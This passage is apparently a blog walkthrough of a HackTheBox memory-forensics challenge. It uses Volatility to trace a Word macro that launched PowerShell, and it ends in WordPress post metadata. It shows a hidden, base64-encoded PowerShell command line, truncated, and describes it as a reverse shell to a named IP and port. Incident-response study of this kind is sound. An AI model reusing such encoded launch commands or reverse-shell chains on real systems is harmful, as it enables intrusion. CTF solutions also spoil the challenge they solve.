Reminiscent is an Easy-rated HackTheBox forensics challenge. A recruiter opened a malicious email attachment and infected their virtual machine. A memory dump was captured during the infection. The task is to reconstruct what happened and recover the flag.<\/p>\n
vol -f flounder-pc-memdump.elf windows.info\n# Kernel: Windows 7 SP1 x64<\/pre>\nProcess tree review<\/h3>\n
vol -f flounder-pc-memdump.elf windows.pstree\n\n# Relevant excerpt:\n# 2736 2608 WINWORD.EXE 2017-10-04 18:39:55\n# ** 3180 2736 powershell.exe 2017-10-04 18:40:00<\/pre>\nWord spawning PowerShell is the classic macro execution chain. That parent-child relationship alone tells you the infection vector: a malicious Office document with an embedded macro. The recruiter opened a resume and the macro ran.<\/p>\n
Extracting the PowerShell command<\/h3>\n
vol -f flounder-pc-memdump.elf windows.cmdline --pid 3180\n\n# Output:\n# 3180 powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4A...<\/pre>\nDecoding the base64:<\/p>\n
echo \"WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4A...\" | base64 -d | iconv -f utf-16le -t utf-8\n# Sets TLS 1.2 then opens a TCP connection to 176.112.74.232:4444<\/pre>\nStandard PowerShell reverse shell phoning back to attacker infrastructure.<\/p>\n
Recovering the malicious document<\/h3>\n
vol -f flounder-pc-memdump.elf windows.filescan | grep -i \"resume\\|\\.docx\"\n# 0x000000013fc10070 \\Users\\user\\Desktop\\resume_scott.docx\n\nvol -f flounder-pc-memdump.elf windows.dumpfiles --physaddr 0x000000013fc10070 -o \/tmp\/<\/pre>\nThe flag is embedded in the recovered document metadata:<\/p>\n
exiftool resume_scott.docx | grep -i \"flag\\|HTB\"\n# Subject: HTB{...}<\/pre>\nKey takeaway<\/h3>\n
Malicious email attachment to macro to PowerShell download cradle to reverse shell. A very common chain in real incidents. The memory artefacts here are extensive because the attacker did nothing to clean up. The Word to PowerShell parent-child relationship in the process tree is the first thing to look at and the base64 in the PowerShell arguments decodes to everything needed to understand the full attack chain.<\/p>\n","protected":false},"excerpt":{"rendered":"
A complete walkthrough of the Reminiscent Easy forensics challenge on HackTheBox. A memory dump from a machine infected via a malicious email attachment. Process tree analysis, base64 command decoding, and document recovery.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-110","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=110"}],"version-history":[{"count":11,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110\/revisions"}],"predecessor-version":[{"id":344,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/110\/revisions\/344"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}